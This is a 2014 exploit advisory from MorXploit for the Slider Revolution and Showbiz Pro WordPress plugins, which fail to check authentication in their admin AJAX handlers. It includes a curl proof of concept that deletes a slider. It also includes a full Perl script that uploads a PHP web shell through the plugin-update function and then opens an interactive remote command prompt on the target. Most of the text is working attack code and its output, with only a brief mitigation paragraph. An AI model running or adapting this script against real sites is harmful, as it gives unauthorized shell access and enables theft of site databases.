#!/usr/bin/perl
Title: Slider Revolution/Showbiz Pro shell upload exploit
Author: Simo Ben youssef
Contact: Simo_at_Morxploit_com
Discovered: 15 October 2014
Coded: 15 October 2014
Updated: 25 November 2014
Published: 25 November 2014
MorXploit Research
Vendor: ThemePunch
Software: Revslider/Showbiz Pro
Versions: <= 3.0.95 (Revslider) / Version: <= 1.7.1 (Showbiz Pro)
Products url:
Vulnerable scripts:
revslider/revslider_admin.php
showbiz/showbiz_admin.php
About the plugins:
The #1 Slider plugin, used by millions, slider revolution is an all-purpose slide displaying solution that allows for showing almost any
kind of content whith highly customizable, transitions, effects and custom animations.
Showbiz Pro is a responsive teaser displaying solution that allows you to show WordPress Posts or any Custom Content with a set
amount of teaser items.
Description:
Slider Revolution and Showbiz Pro fail to check authentication in revslider_admin.php/showbiz_admin.php allowing an unauthenticated
attacker to abuse administrative features.
Some of the features include:
Creating/Deleting/Updating sliders
Importing/exporting sliders
Updading plugin
For a full list of functions please see revslider_admin.php/showbiz_admin.php
PoC on revslider:
1- Deleting a slider:
root@host:/home/rootuser# curl -v --data "action=revslider_ajax_action&client_action=delete_slider&data[sliderid]=1"
http://****.com/wp-admin/admin-ajax.php
* Connected to ****.com (...) port 80 (#0)
> POST /wp-admin/admin-ajax.php HTTP/1.1
> User-Agent: curl/7.35.0
> Host: ****.com
> Accept: /
> Content-Length: 73
> Content-Type: application/x-www-form-urlencoded
>
* upload completely sent off: 73 out of 73 bytes
< HTTP/1.1 200 OK
< Date: Fri, 24 Oct 2014 23:25:07 GMT
* Server Apache/2.4.6 (Unix) OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 is not blacklisted
< Server: Apache/2.4.6 (Unix) OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
< X-Powered-By: PHP/5.4.18
< X-Robots-Tag: noindex
< X-Content-Type-Options: nosniff
< Expires: Wed, 11 Jan 1984 05:00:00 GMT
< Cache-Control: no-cache, must-revalidate, max-age=0
< Pragma: no-cache
< X-Frame-Options: SAMEORIGIN
< Set-Cookie: PHPSESSID=a23ex1c8a573f1d1xd28c301793ba022c; path=/
< Transfer-Encoding: chunked
< Content-Type: text/html; charset=UTF-8
<
* Connection #0 to host http://****.com left intact
{"success":true,"message":"The slider deleted","is_redirect":true,"redirect_url":"http:\/\/****.com\/wp-admin\/admin.php?page=revslider&view=sliders"}
2- Uploading an web shell:
The following perl exploit will try to upload an HTTP php shell through the the update_plugin function
To use the exploit make sure you download first the revslider.zip and showbiz.zip files which contain cmd.php
and save them it in the same directory where you have the exploit.
Demo:
===================================================
— Revslider/Showbiz shell upload exploit
— By: Simo Ben youssef <simo_at_morxploit_com>
===================================================
[*] Target set to revslider
[*] Sent payload
[+] Payload successfully executed
[*] Checking if shell was uploaded
[+] Shell successfully uploaded
Linux MorXploit 3.13.0-24-generic #47-Ubuntu SMP Fri May 2 23:30:00 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@MorXploit:~$
Download:
Exploit:
Exploit update zip files:
Requires LWP::UserAgent
apt-get install libwww-perl
yum install libwww-perl
perl -MCPAN -e 'install Bundle::LWP'
For SSL support:
apt-get install liblwp-protocol-https-perl
yum install perl-Crypt-SSLeay
Mitigation:
Besides the recently LFI vulnerability that was published couple months ago, this is another vulnerability that revslider developers have
decided to patch without releasing a full security advisory, leaving thousands of revslider users who didn't update their plugin to the
latest version (=> 3.0.96) vulnerable to this nasty flaw, revsliders developers will argue the fact that their slider comes with an
auto-update feature, but the problem is that this plugin is bundled with a lot of themes, which means that those themes users may not get
plugin updates or will have to pay to get the update. In other words revslider developers believe that every user should have the
auto-update feature on, otherwise … you are screwed.
Obviously this is way more critical than the LFI vulnerability because it allows shell access giving attackers access to the target system
as well as the ability to dump the entire wordpress database locally.
That being said, upgrade immediately to the latest version or disable/switch to another plugin.
As for Showbiz Pro, sadly the vulnerability has never been patched as we successfully exploited it in the latest version (1.7.1).
Author disclaimer:
The information contained in this entire document is for educational, demonstration and testing purposes only.
Author cannot be held responsible for any malicious use or damage. Use at your own risk.
Got comments or questions?
Simo_at_MorXploit_dot_com
Did you like this exploit?
Feel free to buy me a beer =)
My btc address: 1Ko12CUAFoWn8syrvg4aQokFedNiwD6d7u
Cheers!
use LWP::UserAgent;
use MIME::Base64;
use strict;
sub banner {
system(($^O eq 'MSWin32') ? 'cls' : 'clear');
print "===================================================\n";
print "— Revslider/Showbiz shell upload exploit\n";
print "— By: Simo Ben youssef <simo_at_morxploit_com>\n";
print "— MorXploit Research www.MorXploit.com\n";
print "===================================================\n";
}
if (!defined ($ARGV[0] && $ARGV[1])) {
banner();
print "perl $0 <target> <plugin>\n";
print "perl $0 http://localhost revslider\n";
print "perl $0 http://localhost showbiz\n";
exit;
}
my $zip1 = "revslider.zip";
my $zip2 = "showbiz.zip";
unless (-e ($zip1 && $zip2))
{
banner();
print "[-] $zip1 or $zip2 not found! RTFM\n";
exit;
}
my $host = $ARGV[0];
my $plugin = $ARGV[1];
my $action;
my $update_file;
if ($plugin eq "revslider") {
$action = "revslider_ajax_action";
$update_file = "$zip1";
}
elsif ($plugin eq "showbiz") {
$action = "showbiz_ajax_action";
$update_file = "$zip2";
}
else {
banner();
print "[-] Wrong plugin name\n";
print "perl $0 <target> <plugin>\n";
print "perl $0 http://localhost revslider\n";
print "perl $0 http://localhost showbiz\n";
exit;
}
my $target = "wp-admin/admin-ajax.php";
my $shell = "wp-content/plugins/$plugin/temp/update_extract/$plugin/cmd.php";
sub randomagent {
my @array = ('Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0',
'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31'
);
my $random = $array[rand @array];
return($random);
}
my $useragent = randomagent();
my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
$ua->timeout(10);
$ua->agent($useragent);
my $status = $ua->get("$host/$target");
unless ($status->is_success) {
banner();
print "[-] Xploit failed: " . $status->status_line . "\n";
exit;
}
banner();
print "[] Target set to $plugin\n";
print "[] MorXploiting $host\n";
my $exploit = $ua->post("$host/$target", Cookie => "", Content_Type => "form-data", Content => [action => "$action", client_action => "update_plugin", update_file => ["$update_file"]]);
print "[*] Sent payload\n";
if ($exploit->decoded_content =~ /Wrong update extracted folder/) {
print "[+] Payload successfully executed\n";
}
elsif ($exploit->decoded_content =~ /Wrong request/) {
print "[-] Payload failed: Not vulnerable\n";
exit;
}
elsif ($exploit->decoded_content =~ m/0$/) {
print "[-] Payload failed: Plugin unavailable\n";
exit;
}
else {
$exploit->decoded_content =~ /<\/b>(.*?)<br>/;
print "[-] Payload failed:$1\n";
print "[-] " . $exploit->decoded_content unless (defined $1);
print "\n";
exit;
}
print "[*] Checking if shell was uploaded\n";
sub rndstr{ join'', @[ map{ rand @ } 1 … shift ] }
my $rndstr = rndstr(8, 1…9, 'a'…'z');
my $cmd1 = encode_base64("echo $rndstr");
my $status = $ua->get("$host/$shell?cmd=$cmd1");
if ($status->decoded_content =~ /system\(\) has been disabled/) {
print "[-] Xploit failed: system() has been disabled\n";
exit;
}
elsif ($status->decoded_content !~ /$rndstr/) {
print "[-] Xploit failed: " . $status->status_line . "\n";
exit;
}
elsif ($status->decoded_content =~ /$rndstr/) {
print "[+] Shell successfully uploaded\n";
}
my $cmd2 = encode_base64("whoami");
my $whoami = $ua->get("$host/$shell?cmd=$cmd2");
my $cmd3 = encode_base64("uname -n");
my $uname = $ua->get("$host/$shell?cmd=$cmd3");
my $cmd4 = encode_base64("id");
my $id = $ua->get("$host/$shell?cmd=$cmd4");
my $cmd5 = encode_base64("uname -a");
my $unamea = $ua->get("$host/$shell?cmd=$cmd5");
print $unamea->decoded_content;
print $id->decoded_content;
my $wa = $whoami->decoded_content;
my $un = $uname->decoded_content;
chomp($wa);
chomp($un);
while () {
print "\n$wa\@$un:~\$ ";
chomp(my $cmd=<STDIN>);
if ($cmd eq "exit")
{
print "Aurevoir!\n";
exit;
}
my $ucmd = encode_base64("$cmd");
my $output = $ua->get("$host/$shell?cmd=$ucmd");
print $output->decoded_content;
}